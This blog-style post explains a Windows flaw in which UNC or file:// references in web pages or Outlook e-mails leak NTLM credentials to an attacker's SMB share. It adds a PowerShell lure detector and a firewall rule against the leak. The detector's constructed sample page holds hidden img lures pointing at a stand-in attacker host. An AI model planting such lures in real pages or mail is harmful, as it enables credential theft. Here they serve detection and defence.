A long-standing flaw in Windows lets an attacker capture a user's Windows username and an NTLM challenge-response derived from the password, simply by luring the user to a web page that references an attacker-controlled SMB share. No malware is needed; the page only has to contain the reference. The impact grew with Windows 8 and later, which let users log into Windows with a Microsoft account: what leaks is then the Microsoft account credential, not just a local one.
Flaw was known since 1997:
The flaw is said to have been reported in 1997 by Aaron Spangler, and it was presented again in 2015 by researchers at Black Hat, the annual security and hacking conference in Las Vegas. It was not treated as important enough to fix until Windows 8 appeared. Windows 8 lets users sign into Windows with a Microsoft account, which ties Outlook, Xbox, Hotmail, Skype and Microsoft Visual Studio, among other services, to the same password.
Security flaw triggers when the victim uses IE, Edge or Outlook
The flaw is triggered when the user views content in Internet Explorer or Microsoft Edge (or, as described below, in Outlook). The attacker makes the browser load a resource from a network share that the attacker controls (a UNC path such as \\host\share\file) instead of one on Microsoft's or the user's own network. The user types nothing: the Windows SMB client offers the logged-in user's credentials automatically when it connects to a share, so the browser silently opens the connection and Windows authenticates to the attacker's server on its own.
Windows does not send the password itself; it sends an NTLM challenge-response computed from the password hash (NTLMv2 on current systems). The attacker records the username, the computer or domain name and that response and, according to the researchers, can crack it offline. The weaker the password, the faster it falls.
The flaw can also be triggered by sending the user an HTML e-mail that references the attacker's share. When Outlook renders the message, Windows authenticates to the share just as the browser would, with no interaction beyond viewing the mail.
The VPN provider Perfect Privacy reports in its blog that if the user is connected through a VPN, the Windows credentials are not at risk, but the VPN username and password can end up in the attacker's hands instead. Since those credentials identify the customer, the flaw also undermines a VPN user's anonymity on the internet.
How does it work? A technical overview
Malicious link embedding:
The attacker embeds a reference to an SMB resource in a web page, or in an HTML e-mail that the victim views in Outlook. The reference is usually hidden in an image tag, so the user sees nothing unusual. Instead of fetching an ordinary image over HTTP, the browser or mail client resolves the UNC path, opens an SMB connection to the attacker's server, and Windows authenticates to it with the user's credentials. The attacker's server only has to record the NTLM exchange; it never needs to serve the image.
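As an added example, not code from the original post, the following PowerShell function scans an HTML page or e-mail body for the two reference forms that reach the Windows SMB client (UNC paths and file:// URLs with a remote host) and reports the hosts a victim's machine would authenticate to. The sample page, the host 203.0.113.7 (a documentation address) and the function name are constructed for the demonstration; protocol-relative HTTP links and local file URLs are deliberately left alone, since they do not trigger SMB.

```powershell
function Find-SmbLure {
    # Added example (not from the original post). Returns one object per reference
    # in $Content that would make Windows open an SMB connection to a remote host.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string] $Content
    )
    process {
        # UNC path:  \\host\share\file            (e.g. src="\\host\share\x.png")
        # file URL:  file://host/share/file        (2 to 5 slashes are all accepted)
        # '//cdn.example/x.png' is a protocol-relative HTTP URL and is not matched.
        $patterns = [ordered]@{
            'UNC path' = '(?i)\\\\(?<host>[a-z0-9][a-z0-9.\-]*)\\[^\s"''<>]*'
            'file URL' = '(?i)\bfile:/{2,5}(?<host>[a-z0-9][a-z0-9.\-]*)/[^\s"''<>]*'
        }
        # Local references never leave the machine, so they are not a lure.
        $localHosts = @('localhost', '127.0.0.1', $env:COMPUTERNAME)

        foreach ($kind in $patterns.Keys) {
            foreach ($m in [regex]::Matches($Content, $patterns[$kind])) {
                $target = $m.Groups['host'].Value
                if ($localHosts -contains $target) { continue }
                [pscustomobject]@{
                    Kind      = $kind
                    Host      = $target
                    Reference = $m.Value
                }
            }
        }
    }
}

# Constructed sample page: two hidden lures pointing at an attacker's share, plus
# two references that look similar but are harmless.
$page = @'
<html><body>
<p>Loading...</p>
<img src="\\203.0.113.7\pics\logo.png" width="1" height="1">
<img src="file://///203.0.113.7/pics/logo.png">
<img src="//cdn.example.net/logo.png">
<a href="file://localhost/C:/Users/Public/readme.txt">local file</a>
</body></html>
'@

# Expected: two rows, both with Host 203.0.113.7 (one 'UNC path', one 'file URL').
$page | Find-SmbLure | Format-Table -AutoSize
```

The same function can be pointed at a saved .eml or .msg body exported as HTML; any row it returns names a host that the recipient's Windows would have authenticated to merely by rendering the message.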
How to stay safe from this flaw?
There are a couple of ways to avoid this security flaw.
Block outbound TCP port 445 in Windows Firewall for every destination except the local network. This stops the SMB client from reaching shares on the internet while leaving local file servers and printers reachable. NetBIOS over TCP (port 139) can carry SMB as well, so block it alongside 445. The same effect can be had without touching the firewall through the Group Policy setting Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers.
The other fix is to stop logging into Windows with your Microsoft account and switch back to a local account. This does not stop the leak itself, but what leaks is then a local account credential rather than the password for Outlook, Xbox, Skype and every other service tied to the Microsoft account.
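The firewall fix above, as an added example that is not from the original post: a PowerShell rule that blocks outbound SMB to hosts outside the local subnet, followed by two checks that the rule is in force. It relies on the firewall's predefined 'Internet' address set (hosts outside the local subnet), adds port 139 on top of the 445 the post names, and uses 203.0.113.7 as a stand-in for an attacker's server; the rule name is an assumption. Run it in an elevated PowerShell on Windows 8 or later.

```powershell
# Added example (not from the original post): block outbound SMB to non-local hosts
# in Windows Firewall, then verify. Requires an elevated (Administrator) session and
# the NetSecurity cmdlets shipped with Windows 8 / Server 2012 and later.

# 445 is direct SMB, as the post recommends; 139 (NetBIOS session service) can carry
# SMB too, and adding it is this example's own extension of the post.
$smbPorts = @(139, 445)

# 'Internet' is the firewall's predefined set of addresses outside the local subnet,
# so LAN file servers and printers keep working: outbound traffic is allowed by
# default and this block rule covers only non-local destinations.
New-NetFirewallRule -DisplayName 'Block outbound SMB to non-local hosts' `
    -Direction Outbound -Protocol TCP -RemotePort $smbPorts `
    -RemoteAddress Internet -Action Block -Profile Any -Enabled True

# Check 1: the rule exists, is enabled, and carries the expected ports.
Get-NetFirewallRule -DisplayName 'Block outbound SMB to non-local hosts' |
    ForEach-Object {
        [pscustomobject]@{
            Name    = $_.DisplayName
            Enabled = $_.Enabled
            Action  = $_.Action
            Ports   = ($_ | Get-NetFirewallPortFilter).RemotePort -join ','
        }
    }

# Check 2: an SMB connection to a non-local host is now refused before any NTLM
# exchange can happen. 203.0.113.7 is a documentation address standing in for an
# attacker's server; TcpTestSucceeded should be False.
Test-NetConnection -ComputerName 203.0.113.7 -Port 445 -WarningAction SilentlyContinue |
    Select-Object ComputerName, RemotePort, TcpTestSucceeded
```

To undo the change, remove the rule with `Remove-NetFirewallRule -DisplayName 'Block outbound SMB to non-local hosts'`. On a domain-joined machine that reaches file servers across subnets, replace the 'Internet' keyword with an explicit list of the networks that must stay reachable, since those servers are not on the local subnet either.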
I tried my best to cover this news from all aspects, but if you have any questions to ask, you are more than welcome! And if you like this post, don't forget to share it!